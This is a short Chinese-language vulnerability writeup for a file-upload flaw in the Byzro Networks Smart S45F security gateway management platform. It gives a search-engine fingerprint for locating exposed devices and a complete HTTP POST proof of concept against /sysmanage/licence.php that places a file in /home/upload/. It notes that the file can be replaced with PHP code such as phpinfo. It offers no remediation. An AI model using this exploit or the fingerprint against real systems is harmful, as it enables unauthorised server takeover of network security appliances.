漏洞描述
北京百卓网络科技有限公司(以下简称百卓网络)是一家致力于打造下一代安全互联网的高新技术企业。Byzro Networks Smart S45F多业务安全网关智能管理平台存在文件上传漏洞。攻击者可以利用漏洞获取服务器权限或对系统造成业务影响。
搜索语句
title="PatrolFlow--管理平台"
漏洞详情
文件上传路径
/home/upload/readme.txt
poc
POST /sysmanage/licence.php HTTP/1.1
Host: localhost
Cookie: PHPSESSID=b11375c64210599a5bf9a99744783d48
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Referer: https://localhost/sysmanage/licence.php
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 705
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="ck"
radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="readme.txt"
Content-Type: application/octet-stream
123321
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hid_tftp_ip"
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hid_ftp_ip"
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"
set
-----------------------------42328904123665875270630079328—
上传成功
查看上传文件
确认文件存在,文件上传成功
<?php phpinfo() ?>
此处文件也可替换phpinfo.php